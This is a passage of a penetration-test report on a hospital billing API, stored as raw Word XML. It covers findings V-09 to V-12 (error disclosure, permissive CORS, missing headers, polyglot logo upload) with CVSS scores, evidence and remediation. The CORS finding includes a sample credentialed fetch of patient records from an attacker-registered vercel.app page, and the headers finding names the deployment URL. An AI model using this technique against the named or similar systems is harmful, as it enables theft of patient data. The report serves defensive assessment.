        <w:spacing w:after="120" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Enforce a 5MB maximum file size at the application layer before reading any file content - return HTTP 413 if exceeded. After parsing, enforce a maximum of 1,000 rows per upload request - return HTTP 400 if exceeded. Wrap all pandas parsing operations in try/except blocks and apply a processing timeout to prevent runaway parse operations from blocking the event loop.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5DA3" w:sz="3" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="B7950B" w:val="clear"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">  V-09   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Persistent: Verbose Error Disclosure on HTTP 500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200"/>
        <w:gridCol w:w="1600"/>
        <w:gridCol w:w="2000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Severity</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CVSS v3.1</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OWASP</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Status</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Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:gridSpan w:val="1"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="B7950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MEDIUM</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5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)</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A05:2021 - Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="160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OPEN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backend/app/main.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The global exception handler in backend/app/main.py returns the raw Python exception object serialised as a string (str(exc)) directly in the HTTP 500 response body. This was identified in the prior assessment and marked remediated; however, the current source code retains the vulnerable pattern. Raw exception strings expose full stack traces, internal file paths, database schema fragments, ORM query details, and dependency version information.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Verbose error responses accelerate attacker reconnaissance significantly. Database-related errors may reveal table names, column names, and ORM query structure enabling targeted SQL injection attempts. File path errors reveal the server directory layout. Library version disclosures enable targeted exploitation of known CVEs against specific dependency versions in use.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:val="clear"/>
        <w:spacing w:after="60" w:before="40"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /api/v1/tests/bulk-upload [malformed payload]
HTTP 500 Response body:
{"detail": "'DataFrame' object has no attribute 'code'\n  File '/app/api/v1/endpoints/tests.py', line 147\n  sqlalchemy.exc.OperationalError: (psycopg2.errors.UndefinedColumn)\n  column users.tenant_id does not exist"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Update the global exception handler to differentiate by environment. In production and staging (APP_ENV != development), return only: {"detail": "An unexpected error occurred. Please contact support."}. Log the complete traceback server-side using the Python logging module at ERROR level. In development mode only, the full exception detail may be returned to assist debugging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5DA3" w:sz="3" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="B7950B" w:val="clear"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">  V-10   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Persistent: Overly Permissive CORS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200"/>
        <w:gridCol w:w="1600"/>
        <w:gridCol w:w="2000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Severity</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CVSS v3.1</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OWASP</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Status</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Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:gridSpan w:val="1"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="B7950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MEDIUM</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5.0 (AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N)</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A05:2021 - Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="160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OPEN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backend/app/main.py (CORSMiddleware)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The CORSMiddleware is configured with allow_origin_regex=r"https://.*\.vercel\.app", permitting any vercel.app subdomain to make cross-origin requests with credentials. Since Vercel allows free project deployment on vercel.app subdomains, this effectively grants any attacker-controlled website the ability to bypass Same-Origin Policy protections and make authenticated requests to the API.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">An attacker registers a free Vercel project (e.g., attack-clinic.vercel.app), hosts malicious JavaScript, and uses it to make credentialed API requests on behalf of authenticated users who visit the page. This enables exfiltration of patient records, billing data, and user account information through a CSRF-style attack that bypasses standard browser CORS protections.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:val="clear"/>
        <w:spacing w:after="60" w:before="40"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">CORSMiddleware in main.py:
  allow_origin_regex=r"https://.*\.vercel\.app"
Attacker registers: malicious-app.vercel.app
Hosts: fetch("/api/v1/patients", {credentials:"include"})
Result: Request allowed by CORS - data exfiltrated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Remove the allow_origin_regex parameter entirely. Replace with an explicit string list loaded from the CORS_ORIGINS environment variable. The allowed origins list must contain only the specific, known frontend deployment URLs. Accept only exact origin matches. This change must be tested to confirm that the legitimate frontend continues to function correctly after deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5DA3" w:sz="3" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="B7950B" w:val="clear"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">  V-11   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Missing Security Response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200"/>
        <w:gridCol w:w="1600"/>
        <w:gridCol w:w="2000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Severity</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CVSS v3.1</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OWASP</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Status</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Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:gridSpan w:val="1"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="B7950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MEDIUM</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5.0 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)</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A05:2021 - Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="160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OPEN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backend/app/main.py (middleware stack)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP responses from the API do not include the following security headers: X-Content-Type-Options (nosniff), X-Frame-Options (DENY), Strict-Transport-Security (HSTS with max-age), Content-Security-Policy (CSP), and Referrer-Policy. These headers form a standard defence-in-depth layer that mitigates a broad range of client-side attack vectors independently of application-level controls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Absence of X-Content-Type-Options enables MIME-type sniffing, potentially causing browsers to execute text responses as scripts. Absence of X-Frame-Options permits clickjacking attacks via malicious iframe embedding. Absence of HSTS leaves users on unsecured networks vulnerable to SSL stripping. Absence of CSP amplifies the exploitability of any XSS vulnerability present or introduced in future updates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:val="clear"/>
        <w:spacing w:after="60" w:before="40"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -I https://hospital-billing-system-1.onrender.com/api/v1/
HTTP/2 200
Server: uvicorn
Content-Type: application/json
[Missing headers: X-Content-Type-Options, X-Frame-Options,
 Strict-Transport-Security, Content-Security-Policy, Referrer-Policy]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement a SecurityHeadersMiddleware class inheriting from BaseHTTPMiddleware that appends all five required headers to every HTTP response. Add the middleware to the FastAPI application stack. The Content-Security-Policy value should be tuned to match the actual resource requirements of the application. HSTS max-age should be set to a minimum of 31,536,000 seconds with the includeSubDomains directive.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5DA3" w:sz="3" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="B7950B" w:val="clear"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">  V-12   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Clinic Logo Upload - Polyglot File Attack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200"/>
        <w:gridCol w:w="1600"/>
        <w:gridCol w:w="2000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Severity</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CVSS v3.1</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OWASP</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Status</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Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:gridSpan w:val="1"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="B7950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MEDIUM</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5.4 (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)</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A04:2021 - Insecure Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="160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OPEN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backend/app/api/v1/endpoints/clinic.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The clinic logo upload endpoint validates files using only the declared MIME type and file extension, without magic-byte verification. This allows upload of polyglot files - binary files simultaneously valid as two different formats (e.g., a valid PNG image containing embedded HTML/JavaScript payload). Additionally, uploaded images are not processed to strip EXIF metadata, which may contain GPS coordinates, device serial numbers, or software identifiers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">A polyglot file served as a clinic logo on PDF receipts or the frontend UI may be interpreted by client browsers as a different content type, potentially enabling stored XSS. EXIF metadata leakage exposes privacy-sensitive information from the clinic's devices, including precise geolocation data, which may constitute a data protection compliance violation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:val="clear"/>
        <w:spacing w:after="60" w:before="40"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /api/v1/clinic/logo
